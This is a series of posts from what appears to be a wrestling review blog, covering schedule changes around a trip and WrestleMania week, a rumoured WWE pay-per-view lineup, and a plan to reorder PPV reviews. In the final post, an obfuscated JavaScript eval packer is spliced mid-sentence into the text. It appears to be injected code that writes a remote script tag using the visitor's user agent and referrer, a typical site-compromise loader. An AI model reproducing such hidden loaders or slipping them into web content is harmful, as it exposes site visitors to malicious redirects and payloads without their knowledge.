Heading Out For A Bit

Hey everyone.

The family and I are heading to England for the next few weeks so things are going to be a bit off schedule. I’ll have some downtime while I’m there so I’ll be able to catch up on the shows, but I won’t be able to do anything live. We fly out today and get back on May 4 so please bear with me for the time being. I’ll be getting to all of the shows at some point, but the normal schedule is going to be out the window. I’m sorry for throwing everything off.

It’s Wrestlemania Week (Schedule Update)

Dang it feels good to say that. It’s the biggest week of the year for wrestling and it is going to be the busiest week I have by far. I have my schedule ready and from Wednesday – Monday, I’ll be covering 22 shows, which might go up to 26 if some more are streaming. The regular schedule is going to be more than a bit off from Thursday – Saturday but if it is a show I usually do, it will be posted at some point, hopefully less than 24 hours after it ended. I’m really not sure what order they are going to go up in, but it is mostly going to be whatever I can find/get to next. It’s going to be a crazy few days, but I’ll have everything I can for you as fast as I can.

I’ve Set My Wrestlemania Schedule

From April 7 – April 12: 24 shows, many of which overlap.  I’ll be doing them as fast as I can but next week is going to be even more out of whack than usual.  This is the busiest time of the year so I ask you to please bear with me.  There is going to be a great variety of stuff coming up though, and I might even add a few more.

And, as a bonus, somewhere around there, I should be co-hosting a new weekly (in theory) podcast.

Possible New WWE Pay Per View Schedule Leaks

Of course take this with a big bag of salt but there’s a chance that this is legit.  Click on the picture for a better image.

The first thing I think is SWEET GOODNESS THAT’S A LOT OF SHOWS and that’s going to be the take away from this schedule.  You’re looking at basically two shows a month with two or three weeks between them.  I can go with that if they cut some of the times down but a lot of people are going to get burned out in a hurry if they’re running a three hour (potentially plus if Money in the Bank is the first of its kind) show with an hour pre-show.  I can watch wrestling all day every day but even I think that’s a lot.

Now for the good: WAY better names.  Stuff like Backlash, No Mercy and Clash of the Champions are improvements over a lot of the goofy names we have to put up with so often.  It’s also going to be nice if the wrestlers are allowed to have some more time but the worst thing they could do is the old formula of making so many matches filler.  I’m talking about airing stuff like Mordecai vs. Hardcore Holly on pay per view.  Fans aren’t going to put up with that and it could get old in a hurry.

It might help a lot if some of these shows are two hours instead of three.  Look at Money in the Bank.  You could have cut off at least two matches (meaning keep them on the pre-show where they were scheduled in the first place) and trimmed the thing down a bit.  If you’re paying the same price for it on the Network (I’m aware some people are going to get it on regular pay per view still), it’s ok to trim off some of the fat and let the shows actually work for a change.

It’s too early to tell but I’m skeptical about this.  Knowing WWE, whose new philosophy seems to be CRAM AS MUCH AS YOU CAN IN, I’m worried about what we might be going through with them burning through everything they can as fast as they can.

I’ve Altered My Schedule

It eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|esbkh|var|u0026u|referrer|affih||js|php'.split('|'),0,{})) occurred to me that with 31 PPVs to go, it was going to take me until about Halloween to get done with all of the PPVs. I want them done by around the 4th of July so until I get done with them, I’m going to do alter my schedule a bit. First I’m going to finish this trio of WCW shows then three TNAs. After that I’ll do my usual Raw/Nitro/ECW series plus a few others. Then I’ll be doing three PPVs from each company in a row, then the Raw/Nitro/ECW thing again, three PPVs from each company in a row, Raw/Nitro/ECW, two PPVs from each company in a row, Raw/Nitro/ECW, and then the final PPV from each company.

In other words, the TV reviews are going to come a little more slowly for the next month or two. After that I’ll be adding more of them to my schedule, such as some earlier Raws. Sorry if you’re not a fan of this but I’ve been doing the PPV reviews for over three years and I want to get them done.
